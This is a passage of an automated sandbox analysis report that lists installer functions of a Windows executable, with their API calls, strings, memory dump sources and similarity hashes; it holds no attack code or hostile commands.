Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00015000,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

%u.%u%s%s, xrefs: 00404444
@rD, xrefs: 00404402

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

, xrefs: 004048DA
@rD, xrefs: 00404934

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

%02x%c, xrefs: 00406270
..., xrefs: 00406293

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Section: "%s", xrefs: 00405079
Skipping section: "%s", xrefs: 004050B5

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
